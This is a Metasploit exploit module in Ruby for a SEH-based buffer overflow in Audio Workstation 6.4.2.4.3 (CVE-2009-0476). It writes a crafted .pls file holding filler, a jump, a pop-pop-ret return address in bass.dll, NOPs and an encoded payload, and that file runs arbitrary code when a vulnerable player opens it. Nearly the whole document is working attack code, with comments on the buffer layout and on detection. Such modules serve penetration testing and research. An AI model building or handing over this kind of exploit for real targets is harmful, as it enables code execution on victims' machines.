##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format exploit module for Audio Workstation 6.4.2.4.3
# (CVE-2009-0476 / OSVDB 55424 / EDB 10353, disclosed 2009-12-08).
#
# Nothing here contacts a target: #exploit writes a crafted .pls file to the
# FILENAME option, and the overflow only triggers when a vulnerable Audio
# Workstation opens that file. The generated file is a raw buffer of fixed
# length (see #exploit), not a well-formed playlist.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # FILEFORMAT provides the FILENAME option and file_create; Seh is pulled in
  # for the SEH-overwrite conventions used by the payload settings below.
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Registers module metadata, payload constraints and the FILENAME option.
  #
  # @param info [Hash] extra info merged by update_info into the module description
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
          When opening a malicious pls file with the Audio Workstation,
          a remote attacker could overflow a buffer and execute
          arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'germaya_x', 'dookie', ],
        'References' => [
          [ 'CVE', '2009-0476' ],
          [ 'OSVDB', '55424' ],
          [ 'EDB', '10353' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh', # payload exit method; consistent with the SEH-based overwrite
          'DisablePayloadHandler' => true, # file-format module: no handler/listener is started by default
          'AllowWin32SEH' => true
        },
        'Payload' => {
          'Space' => 4100, # upper bound on payload.encoded; always fits the fixed 4652-byte region in #exploit
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper, # encoded payload is upper-case alphanumeric, like the rand_text_alpha_upper filler
          'DisableNops' => true, # framework NOP padding is off; #exploit inserts its own make_nops(32)
        },
        'Platform' => 'win',
        'Targets' => [
          # Single target: the Ret value is what #exploit packs into the buffer.
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-12-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Output path used by file_create in #exploit.
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
      ]
    )
  end

  # Builds the crafted .pls content and writes it via file_create.
  #
  # Buffer layout, in order: 1308 bytes of random upper-case filler, a
  # 4-byte literal, target.ret packed as a 32-bit little-endian value
  # ('V'), 32 bytes from make_nops, the encoded payload, then random
  # upper-case filler so that payload plus filler is exactly 4652 bytes.
  # The file is therefore always 1308 + 4 + 4 + 32 + 4652 = 6000 bytes,
  # regardless of payload size, and contains no playlist structure — both
  # are useful properties when writing detection for this artifact.
  #
  # @return [void] side effect only: the file named by FILENAME is written
  def exploit
    sploit = rand_text_alpha_upper(1308)
    sploit << "\xeb\x16\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << make_nops(32)
    sploit << payload.encoded
    # Pad to a constant size; Space (4100) guarantees this length is non-negative.
    sploit << rand_text_alpha_upper(4652 - payload.encoded.length)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end